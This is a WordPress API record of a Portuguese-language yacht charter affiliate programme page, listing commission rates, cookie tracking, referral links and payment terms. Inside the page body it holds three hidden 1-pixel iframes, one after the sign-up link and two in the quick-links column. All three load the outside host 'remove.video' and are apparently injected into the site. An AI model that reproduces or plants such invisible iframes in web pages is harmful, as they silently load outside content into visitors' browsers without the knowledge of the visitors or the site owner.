{"id":412127,"date":"2024-01-15T12:32:29","date_gmt":"2024-01-15T12:32:29","guid":{"rendered":"https:\/\/www.skippercity.com\/programa-de-afiliados-de-aluguel-de-iates\/"},"modified":"2024-02-21T11:19:50","modified_gmt":"2024-02-21T11:19:50","slug":"programa-de-afiliados-de-aluguel-de-iates","status":"publish","type":"page","link":"https:\/\/skippercity.com\/pt-br\/programa-de-afiliados-de-aluguel-de-iates\/","title":{"rendered":"Programa de afiliados de aluguel de iates"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"412127\" class=\"elementor elementor-412127 elementor-412040\" data-elementor-post-type=\"page\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1250e588 elementor-section-full_width elementor-section-height-min-height elementor-section-items-stretch elementor-section-content-middle elementor-section-height-default\" data-id=\"1250e588\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-9f1c76f\" data-id=\"9f1c76f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4a4f0833 elementor-widget elementor-widget-heading\" data-id=\"4a4f0833\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h1 class=\"elementor-heading-title elementor-size-default\">Programa de afiliados de aluguel de iates<\/h1>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4eaa1748 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4eaa1748\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-25087f4b\" data-id=\"25087f4b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-571c4982\" data-id=\"571c4982\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-66f25697\" data-id=\"66f25697\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4518a569 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4518a569\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-4a55adf6\" data-id=\"4a55adf6\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-225b732b elementor-widget elementor-widget-text-editor\" data-id=\"225b732b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\"><strong>Fatos r\u00e1pidos:<\/strong><\/span><\/p>\n<ul>\n<li>Programa de afiliados mais bem pago<\/li>\n<li>20-25% de nossa comiss\u00e3o sobre o aluguel de barcos<\/li>\n<li>Comiss\u00f5es vital\u00edcias<\/li>\n<li>Expira\u00e7\u00e3o de 365 dias do cookie<\/li>\n<\/ul>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-16c35e15 elementor-widget elementor-widget-table-of-contents\" data-id=\"16c35e15\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;exclude_headings_by_selector&quot;:[],&quot;headings_by_tags&quot;:[&quot;h2&quot;,&quot;h3&quot;,&quot;h4&quot;,&quot;h5&quot;,&quot;h6&quot;],&quot;marker_view&quot;:&quot;numbers&quot;,&quot;no_headings_message&quot;:&quot;N\\u00e3o foram encontrados cabe\\u00e7alhos nesta p\\u00e1gina.&quot;,&quot;hierarchical_view&quot;:&quot;yes&quot;,&quot;min_height&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]}}\" data-widget_type=\"table-of-contents.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-toc__header\">\n\t\t\t\t\t\t<h4 class=\"elementor-toc__header-title\">\n\t\t\t\tTabela de Conte\u00fados\t\t\t<\/h4>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div id=\"elementor-toc__16c35e15\" class=\"elementor-toc__body\">\n\t\t\t<div class=\"elementor-toc__spinner-container\">\n\t\t\t\t<svg class=\"elementor-toc__spinner eicon-animation-spin e-font-icon-svg e-eicon-loading\" aria-hidden=\"true\" viewBox=\"0 0 1000 1000\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M500 975V858C696 858 858 696 858 500S696 142 500 142 142 304 142 500H25C25 237 238 25 500 25S975 237 975 500 763 975 500 975Z\"><\/path><\/svg>\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-70ed3a7f\" data-id=\"70ed3a7f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4c5b7b5f elementor-widget elementor-widget-text-editor\" data-id=\"4c5b7b5f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2>Programa de afiliados de aluguel de iates<\/h2>\n<p>Se voc\u00ea tiver um site com clientes que possam estar interessados em fretar iates &#8211; barcos a vela, gulets, iates a motor, superiates &#8211; em qualquer lugar do mundo, teremos interesse em trabalhar com voc\u00ea em uma parceria de afiliados.<\/p>\n<p><u><b>N\u00f3s amamos os Parceiros!<\/b><\/u><\/p>\n<p>O Programa de Afiliados da Yachtco permite que voc\u00ea comece a ganhar dinheiro com o aluguel de iates simplesmente adicionando um link do seu site para o nosso.<\/p>\n<h2>Como isso funciona?<\/h2>\n<p>Quando um cliente <strong>clica em seu link em seu site<\/strong> (ou blog ou m\u00eddia social), acaba em nosso site e, em seguida, freta um barco por meio de n\u00f3s, uma porcentagem da comiss\u00e3o \u00e9 creditada a voc\u00ea de acordo com nossos termos e condi\u00e7\u00f5es. Tudo \u00e9 monitorado (eletronicamente e off-line) e n\u00f3s monitoramos o status do lead para voc\u00ea.<\/p>\n<p><strong>Um corretor (ou seja, n\u00f3s) recebe uma taxa<\/strong> sobre o valor l\u00edquido do afretamento de uma reserva de barco (sem incluir o APA ou quaisquer itens ou servi\u00e7os adicionais solicitados). Essa comiss\u00e3o depende da localiza\u00e7\u00e3o, do tipo de barco e das comiss\u00f5es do setor. <strong>O afiliado (ou seja, voc\u00ea) ganhar\u00e1 de 20 a %-25%<\/strong> como taxa b\u00e1sica por essa comiss\u00e3o recebida do corretor.<\/p>\n<p><b>A Skippercity se orgulha de fazer um acompanhamento fiel de todos os clientes de fretamento e, portanto, os afiliados s\u00e3o compensados ganhando de 20 a %-25% de nossa comiss\u00e3o em todas as reservas de clientes que retornam a n\u00f3s.<\/b><\/p>\n<p>Nosso sistema rastreia os clientes que j\u00e1 fizeram consultas ou reservas com um afiliado, de modo que sempre podemos devolver as comiss\u00f5es ao afiliado. A Skippercity respeitar\u00e1 a introdu\u00e7\u00e3o e oferecer\u00e1 aos afiliados uma taxa de introdu\u00e7\u00e3o caso o cliente retorne \u00e0 Skippercity fora do programa de afiliados (ou seja, sem cookies) para honrar o link que nos forneceu, uma vez que ele chegou at\u00e9 n\u00f3s anteriormente por meio de um afiliado.<\/p>\n<p>3.000 euros \u00e9 o valor l\u00edquido m\u00e9dio de fretamento para come\u00e7ar a receber sua comiss\u00e3o. Nossos termos e condi\u00e7\u00f5es se aplicam.<\/p>\n<p>Temos formas de consulta, imagens elegantes e bot\u00f5es para voc\u00ea. Todos eles est\u00e3o dispon\u00edveis em seu &#8220;painel&#8221; de afiliados, portanto, tudo o que voc\u00ea precisa fazer \u00e9 copiar e colar o c\u00f3digo em seu site, e tudo estar\u00e1 pronto para come\u00e7ar!<\/p>\n<p>Seu URL para afiliados ser\u00e1 https:\/\/skippercity.com\/?ref=username. Basta instalar o c\u00f3digo (?ref=?ref=username) no final de qualquer link para o Skippercity, e tudo ser\u00e1 monitorado a partir da\u00ed!<\/p>\n<p><a href=\"https:\/\/skippercity.com\/pt-br\/torne-se-nosso-afiliado\/\">Se estiver interessado em se inscrever em nosso programa de afiliados, clique aqui para se<\/a> inscrever e processaremos sua solicita\u00e7\u00e3o para participar do programa.<\/p>\n<p>Todo o conte\u00fado do site SkipperCity \u00e9 protegido por direitos autorais. N\u00e3o incentivamos nossos afiliados a usar qualquer conte\u00fado do site https:\/\/skippercity.com e a copiar ou duplicar o material em seu pr\u00f3prio site como se fosse seu de alguma forma. Mas voc\u00ea pode criar seu pr\u00f3prio conte\u00fado e criar um link para n\u00f3s.<\/p>\n<h2>Como monitoramos as vendas<\/h2>\n<p>Todos os clientes provenientes de seu site ser\u00e3o &#8220;cookied&#8221; e sua conta ser\u00e1 vinculada por cookies. Quando um cliente nos envia uma consulta ou cria uma conta conosco, fazemos o que fazemos de melhor: recomendamos o barco certo, organizamos o contrato e os pagamentos e providenciamos o embarque do cliente.<\/p>\n<p>Se o cliente que fretar um iate vier do seu site, n\u00f3s compartilharemos com voc\u00ea uma parte da comiss\u00e3o.<\/p>\n<h2>Como voc\u00ea \u00e9 pago?<\/h2>\n<p>Pagamos nossos afiliados por transfer\u00eancia banc\u00e1ria ou via Stripe.<\/p>\n<p>Os afiliados ser\u00e3o pagos um m\u00eas ap\u00f3s a conclus\u00e3o satisfat\u00f3ria do afretamento &#8211; essa \u00e9 a norma do setor para todas as partes interessadas. Todos os participantes s\u00e3o pagos ap\u00f3s a conclus\u00e3o bem-sucedida dos fretamentos porque, se houver algum problema durante o fretamento, queremos garantir que os corretores, os gerentes de iate, os capit\u00e3es e os propriet\u00e1rios resolvam o problema antes que os clientes desembarquem do iate.<\/p>\n<p>Para todos os fretamentos cancelados (por clientes ou propriet\u00e1rios), afiliados, agentes de viagem e todas as indica\u00e7\u00f5es n\u00e3o recebem nenhuma comiss\u00e3o.<\/p>\n<h2>Como se inscrever no programa de afiliados<\/h2>\n<p>Para se candidatar ao programa de afiliados, voc\u00ea deve ter um site, blog ou rede social com uma base de clientes complementar ao iate fretado (viagens, produtos de luxo, servi\u00e7os de concierge, etc.).<\/p>\n<p>Voc\u00ea n\u00e3o tem nenhum risco ou despesa com o programa de afiliados. Tudo o que voc\u00ea precisa fazer \u00e9 <a href=\"https:\/\/skippercity.com\/pt-br\/torne-se-nosso-afiliado\/\">preencher nosso formul\u00e1rio on-line.<\/a><iframe style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/p>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-74185aa8 elementor-align-justify elementor-widget elementor-widget-button\" data-id=\"74185aa8\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm\" href=\"https:\/\/skippercity.com\/pt-br\/torne-se-nosso-afiliado\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">Inscreva-se em nosso programa de afiliados para aluguel de iates<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-1b9e4a7d\" data-id=\"1b9e4a7d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7c060e83 elementor-widget elementor-widget-text-editor\" data-id=\"7c060e83\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\">Links r\u00e1pidos:<\/span><\/p>\n<ul>\n<li><a href=\"https:\/\/skippercity.com\/pt-br\/torne-se-nosso-afiliado\/\">Registro\/Assinatura<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/pt-br\/login-de-afiliado\/\">Login<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/pt-br\/a-minha-conta-2\/\">Sua conta de afiliado<\/a><\/li>\n<\/ul>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Programa de afiliados de aluguel de iates Fatos r\u00e1pidos: Programa de afiliados mais bem pago 20-25% de nossa comiss\u00e3o sobre o aluguel de barcos Comiss\u00f5es vital\u00edcias Expira\u00e7\u00e3o de 365 dias do cookie Tabela de Conte\u00fados Programa de afiliados de aluguel de iates Se voc\u00ea tiver um site com clientes que possam estar interessados em fretar [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":408270,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-412127","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/skippercity.com\/pt-br\/wp-json\/wp\/v2\/pages\/412127","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/skippercity.com\/pt-br\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/skippercity.com\/pt-br\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/skippercity.com\/pt-br\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/skippercity.com\/pt-br\/wp-json\/wp\/v2\/comments?post=412127"}],"version-history":[{"count":0,"href":"https:\/\/skippercity.com\/pt-br\/wp-json\/wp\/v2\/pages\/412127\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/skippercity.com\/pt-br\/wp-json\/wp\/v2\/media\/408270"}],"wp:attachment":[{"href":"https:\/\/skippercity.com\/pt-br\/wp-json\/wp\/v2\/media?parent=412127"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}